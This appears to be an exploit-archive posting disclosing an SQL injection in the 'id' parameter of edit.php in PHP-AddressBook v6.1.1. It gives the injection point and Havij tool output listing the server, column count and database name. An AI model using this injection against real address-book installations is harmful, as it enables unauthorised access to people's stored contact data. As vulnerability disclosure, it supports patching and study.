facebook facebook twitter rss

PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability

Author: TUNISIAN CYBER , Published: 08-12-2013
X-------------------------------------------------------------X
_____ _ _ _ _ _____ _____ _____ ___ _ _ _______ _______ ___________
|_ _| | | | \ | |_ _/ ___|_ _|/ _ \ | \ | | / __ \ \ / / ___ \ ___| ___ \
| | | | | | \| | | | \ `--. | | / /_\ \| \| | | / \/\ V /| |_/ / |__ | |_/ /
| | | | | | . ` | | | `--. \ | | | _ || . ` | | | \ / | ___ \ __|| /
| | | |_| | |\ |_| |_/\__/ /_| |_| | | || |\ | | \__/\ | | | |_/ / |___| |\ \
\_/ \___/\_| \_/\___/\____/ \___/\_| |_/\_| \_/ \____/ \_/ \____/\____/\_| \_|
X-------------------------------------------------------------X


[+] Author: TUNISIAN CYBER
[+] Exploit Title: PHP-AddressBook v6.1.1 (edit.php) SQL Injection Vulnerability
[+] Date: 8-12-2013
[+] Vendor:aguestbook.sourceforge.net/
[+] Category: WebApp
[+] Google Dork: n/a
[+] Tested on: Win7 , ubuntu 13.04


########################################################################################
Exploit:
127/PATH/edit.php?id=[SQL]

Localtest:http://oi44.tinypic.com/b4t37n.jpg
---------------------------
Havij Result:
Host IP: 127.0.0.1
Web Server: Apache/2.2.8 (Win32) PHP/5.2.6
Powered-by: PHP/5.2.6
Keyword Found: Smith
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Selected Column Count is 25
Valid String Column is 2
Current DB: address



./3nD
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt

Like us on Facebook :